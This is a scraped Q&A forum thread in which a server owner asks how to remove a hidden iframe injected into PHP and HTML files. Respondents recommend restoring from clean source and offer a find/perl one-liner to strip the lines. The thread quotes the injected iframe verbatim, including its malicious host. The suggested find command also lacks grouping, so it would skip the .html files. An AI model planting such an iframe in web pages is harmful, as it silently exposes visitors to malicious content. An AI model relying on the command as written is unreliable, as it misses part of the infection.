Iframe virus, need to be removed from all phps and html file on linux server
The following line has been added to almost all the php files and some of the html files on my linux server WHat is the command to remove this without damaging anything else?
iframe qoluu='V5pEXGSm' src='http://getrelax4you.com/in.cgi?7 ' width='98' height='407' style='display:none'>
The开发者_C百科 beginning and end of the above line has < >
and will the command search all folders?
Your server has been compromised, simply restore the site files on to a clean server, from your source code repository.
Fixing any user data up may be more tricky, you can no longer trust the contents of your db, so you have to be very careful. Better luck next time.
Simplified solution, assuming that all virus code is on a single line:
find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;
Short explanation: visit all files under /www/directory with html or php extension. Use perl to edit each file in place by copying all lines verbatim to output, unless they contain string "getrelax4you.com"; which are removed.
Caveat emptor! Make backup before trying this; i might have missed some small detail.
精彩评论